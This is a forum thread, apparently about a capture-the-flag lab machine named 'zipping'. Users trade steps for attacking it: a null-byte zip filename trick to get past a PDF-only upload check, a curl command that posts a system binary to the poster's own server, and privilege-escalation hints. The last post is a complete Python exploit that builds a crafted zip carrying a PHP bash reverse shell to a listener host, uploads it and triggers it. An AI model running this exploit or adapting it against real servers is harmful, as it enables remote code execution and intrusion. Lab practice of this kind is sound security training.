# zipping
by hooneyman - Saturday August 26, 2023 at 09:52 PM
#11
(Aug 27, 2023, 03:52 PM)hackxor Wrote:
(Aug 27, 2023, 03:36 PM)SingaporeFriend Wrote: Normal upload protection bypasses work, if you managed to create a file with those characters inside the zip.

I've tried using a double extension, a null byte at the end, and some other techniques, but nothing worked; I can upload the file, but it's always going to be a PDF. Using the zip symlink I got "/shop/index.php", but I didn't know if it's possible to bypass the

$page = isset($_GET['page']) && file_exists($_GET['page'] . '.php') ? $_GET['page'] : 'home';

so how did you trigger the file?

To get the rev shell: Give it a name, for example, shell.phpA.pdf. Compress it. You don't need to do any tricks with symbolic links. Open it in hexedit and change the 'A' to 00 (null byte). Upload this and go to the endpoint of the file you are given. Delete the <space> .pdf in the url. You will get a shell.
#12
it worked!!! thanks buddy
#13
Anyone got further with reverse engineering? Figured out the password, but not much more.
#14
(Aug 27, 2023, 05:08 PM)robillard Wrote: Silly question, but how did you manage to send the "stock" file to your computer? Neither python nor netcat is working

python3 -m uploadserver
curl -i -X POST -F "files=@/usr/bin/stock" http://10.10.X.X:8000/upload
#15
(Aug 27, 2023, 04:56 PM)SingaporeFriend Wrote: Anyone got further with reverse engineering? Figured out the password, but not much more.

it is not necessary to use reverse engineering; for the password use strings, and to see the vulnerability to get root use strace
#16
(Aug 27, 2023, 05:53 PM)frfrfrfrfrfrf Wrote:
(Aug 27, 2023, 04:56 PM)SingaporeFriend Wrote: Anyone got further with reverse engineering? Figured out the password, but not much more.

it is not necessary to use reverse engineering; for the password use strings, and to see the vulnerability to get root use strace

thanks, that was the hint I needed.

For anyone else, just run the binary with strace and look closely at the output.
#17
(Aug 27, 2023, 05:53 PM)frfrfrfrfrfrf Wrote:
(Aug 27, 2023, 04:56 PM)SingaporeFriend Wrote: Anyone got further with reverse engineering? Figured out the password, but not much more.

it is not necessary to use reverse engineering; for the password use strings, and to see the vulnerability to get root use strace

thanks man, I've rooted it
#18
(Aug 27, 2023, 08:07 PM)th3unknown Wrote: I followed all the steps mentioned in previous messages (create a shell.phpX.pdf, zip it, hexedit the X to 00, upload it), but once I tried to access the created url I get a "Not Found" error. What am I doing wrong?
I used the rev shell from pentestmonkey, is there any chance that the shell is the problem?

change the byte at the end of the zip file instead of the beginning
#19
(Aug 27, 2023, 08:55 PM)pollero Wrote:
(Aug 27, 2023, 06:50 PM)robillard Wrote:
(Aug 27, 2023, 06:29 PM)SingaporeFriend Wrote:
(Aug 27, 2023, 05:53 PM)frfrfrfrfrfrf Wrote:
(Aug 27, 2023, 04:56 PM)SingaporeFriend Wrote: Anyone got further with reverse engineering? Figured out the password, but not much more.

it is not necessary to use reverse engineering; for the password use strings, and to see the vulnerability to get root use strace

thanks, that was the hint I needed.

For anyone else, just run the binary with strace and look closely at the output.

Has it something to do with libcounter.so?

I think yes, but... do you know how to execute strace with sudo?

you don't need to use strace with sudo actually
#20
I wrote a script to get a reverse shell as the user.
Start nc on port 9001 and then run it like this: python script.py -L <your-IP> -R <target-IP>

import sys
from struct import pack
import argparse
import zlib
import requests

parser = argparse.ArgumentParser(description='Exploit Zipper')
parser.add_argument('-L', '--listener_ip', required=True, help='listener ip')
parser.add_argument('-R', '--target_ip', required=True, help='target ip')
args = parser.parse_args()

# The entry name is stored twice in a zip: once in the local file header and
# once in the central directory. Only the central directory copy carries the
# null byte after ".php".
filename1 = b'rev.php.pdf'
filename2 = b'rev.php\x00.pdf'

filecontent = b"""<?php system("bash -c 'bash -i >& /dev/tcp/"""+args.listener_ip.encode()+b"""/9001 0>&1'"); ?>"""
length = len(filecontent)
crc = zlib.crc32(filecontent)

# local file header followed by the stored (uncompressed) data
p  = b''
p += b'\x50\x4b\x03\x04' # signature
p += b'\x14\x00' # version needed to extract (2.0)
p += b'\x00\x00' # flags
p += b'\x00\x00' # compression (0 = stored)
p += b'\x48\xb9' # modtime
p += b'\x1b\x57' # moddate
p += pack("<L", crc) # crc-32
p += pack("<L", length) # compressed size (same as uncompressed: stored)
p += pack("<L", length) # uncompressed size
p += pack("<H", len(filename1)) # filename len
p += b'\x00\x00' # extra field len
p += filename1
p += filecontent

# central directory (one entry)
cd  = b''
cd += b'\x50\x4b\x01\x02' # signature
cd += b'\x14\x03' # version made by (2.0, UNIX)
cd += b'\x14\x00' # version needed to extract (2.0)
cd += b'\x00\x00' # flags
cd += b'\x00\x00' # compression (0 = stored)
cd += b'\x48\xb9' # modtime
cd += b'\x1b\x57' # moddate
cd += pack("<L", crc) # crc-32
cd += pack("<L", length) # compressed size
cd += pack("<L", length) # uncompressed size
cd += pack("<H", len(filename2)) # filename len (includes the null byte)
cd += b'\x00\x00' # extra field len
cd += b'\x00\x00' # file comment len
cd += b'\x00\x00' # disk number start
cd += b'\x00\x00' # internal attr.
cd += b'\x00\x00\xA4\x81' # external attr (0100644, regular file)
cd += b'\x00\x00\x00\x00' # offset of local header (start of file)
cd += filename2

# end of central directory record
ecd  = b''
ecd += b'\x50\x4b\x05\x06' # signature
ecd += b'\x00\x00' # number of this disk
ecd += b'\x00\x00' # disk where the central directory starts
ecd += b'\x01\x00' # central directory entries on this disk
ecd += b'\x01\x00' # total central directory entries
ecd += pack("<L", len(cd)) # central directory size
ecd += pack("<L", len(p)) # offset of the central directory (right after the local entry)
ecd += b'\x00\x00' # comment length

with open("rev.zip", "wb") as f:
    f.write(p+cd+ecd)

# requests builds the multipart body and boundary itself; the zip is sent as the
# 'zipFile' field, with an empty 'submit' field as the form expects.
url = "http://{}/upload.php".format(args.target_ip)
files = {'submit':(None,''),'zipFile':('rev.zip',p+cd+ecd)}
resp = requests.post(url, files=files)

# The response echoes the path of the extracted file; requesting it runs the
# PHP, so this GET blocks for as long as the reverse shell stays open.
for line in resp.text.split('\n'):
    if 'uploads' in line:
        requests.get("http://{}/{}".format(args.target_ip,line.split('"')[1].split(" ")[0]))
        sys.exit(0)

